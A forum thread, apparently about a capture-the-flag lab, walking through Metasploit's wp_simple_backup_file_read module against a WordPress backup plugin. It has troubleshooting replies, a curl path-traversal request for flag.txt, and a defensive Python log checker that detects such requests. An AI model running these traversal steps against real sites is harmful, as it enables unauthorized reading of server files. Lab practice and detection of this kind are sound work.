Hello, it's x69h4ck3r. I am gonna make this as straightforward as possible, because you may have spent hours on this.
OK, let's jump into it.
Step 1: Search for the plugin exploit on the web.
Example: search on google.com like this: "Backup Plugin 2.7.10 for WordPress exploit"
When done, you will get lots of results.
Pick the one from Rapid7; it's short.
On Rapid7 the Metasploit module for this vulnerability
is shown: "wp_simple_backup_file_read".
We then go to our terminal and fire up the Metasploit Framework
in order to use this exploit on our target server.
Step 2: Fire up the Metasploit database.
Run this command in your terminal to start up the PostgreSQL DB:
systemctl start postgresql
Run this command to start Metasploit:
msfconsole
Search for the exploit using this command:
search exploit wordpress plugin backup
Locate "wp_simple_backup_file_read" and use the command below:
use auxiliary/scanner/http/wp_simple_backup_file_read
Once inside the module, type "show options".
Change RHOSTS to the target IP;
change RPORT to the target port;
change FILEPATH to /flag.txt.
Press enter, then cross-check your parameters by using the "show options" command.
Once satisfied, type the "run" or "exploit" command to get the exploit working,
and the flag will be downloaded into the .msf4/loot/ folder.
You can use "locate /.msf4/loot/" to locate and pivot into the directory
and then read the file with the "cat" command.
I hope this was useful. Please like and comment, and let me know if this solved your problem.
When I do this, nothing downloads into the loot folder. It just says:
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Here are my options for reference:
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > options

Module options (auxiliary/scanner/http/wp_simple_backup_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /flag.txt        yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     142.93.47.26     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      30633            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host
What do you think? What am I doing wrong? Is there something wrong with the box?
For the record, I also tried it with just flag.txt (no quotes) as the filepath, and a lot of other things, including a bunch of stuff you'd expect to see in /etc.
For a minute I got confused when I didn't see the msf output. Later I realized I forgot to set the RPORT associated with the target IP. Once I did, I got the output.
Two questions:
1) The nmap of my Target Instance is as follows:
nmap -sV -A -p<Target Instance Port #> <Target Instance IP address without Port #>

PORT                          STATE SERVICE VERSION
<Target Instance Port #>/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.6.1
|_http-title: Getting Started – Just another WordPress site
|_http-server-header: Apache/2.4.41 (Ubuntu)

How should we know to target the WordPress application and not Apache 2.4.41?
2) How would we know (aside from the tip) to use a 'plugin' type of attack against the WordPress application?
When playing around with web requests and you get an error like this, it's always helpful to use Burp Suite to intercept the web request and response and check what the root cause is there.
curl -v -x http://127.0.0.1:8080 "http://<ip>:<port>/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../flag.txt"
The -x http://127.0.0.1:8080 flag here indicates that the request will go through the Burp Suite proxy. Once you capture the request, send it to Repeater and play around with the request there. You'll get to know whether the payload is incorrect or there is some problem with the network/VPN.
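As an added defensive example (not code from any post in this thread, and not part of the plugin or of Metasploit): a small Python checker that parses Apache access log lines and flags requests to the tools.php download_backup_file parameter whose value escapes the backup directory, so the traversal shown in the curl request above can be spotted from the web server's side. The log lines are constructed; the fake base path and the three-round decoding loop (to catch values encoded more than once) are my own assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" format: client ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) '
)
ENDPOINT = "/wp-admin/tools.php"   # endpoint and parameter taken from the curl request in the thread
PARAM = "download_backup_file"

# Constructed sample access log, not captured from the lab box.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2021:12:00:01 +0000] "GET /wp-admin/tools.php?page=backup_manager HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Feb/2021:12:00:02 +0000] "GET /wp-admin/tools.php?page=backup_manager&download_backup_file=site-backup.zip HTTP/1.1" 200 90210 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Feb/2021:12:01:10 +0000] "GET /wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../flag.txt HTTP/1.1" 200 38 "-" "curl/7.74.0"
198.51.100.9 - - [10/Feb/2021:12:01:11 +0000] "GET /wp-admin/tools.php?page=backup_manager&download_backup_file=..%252f..%252f..%252f..%252fflag.txt HTTP/1.1" 200 38 "-" "curl/7.74.0"
192.0.2.7 - - [10/Feb/2021:12:02:00 +0000] "GET /index.php?p=../../notes.txt HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

def is_traversal(value):
    """True if the value (possibly URL-encoded more than once) escapes the backup directory."""
    decoded = value
    for _ in range(3):             # peel repeated encodings such as ..%252f (assumed depth of 3)
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.replace("\\", "/")
    if decoded.startswith("/"):    # an absolute path is never a legitimate backup name
        return True
    resolved = posixpath.normpath("/base/" + decoded)   # resolve against a fake base directory
    return resolved != "/base" and not resolved.startswith("/base/")

def find_traversal_attempts(lines):
    """Return (client, status, raw parameter value) for each abusive download request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != ENDPOINT:   # only the plugin's download endpoint is in scope
            continue
        for value in parse_qs(url.query).get(PARAM, []):   # parse_qs URL-decodes once
            if is_traversal(value):
                hits.append((m.group("client"), int(m.group("status")), value))
    return hits
```

A status of 200 on a flagged line means the server actually served the file, which is the case to escalate; a 403 or 404 means the request was blocked or the file was absent.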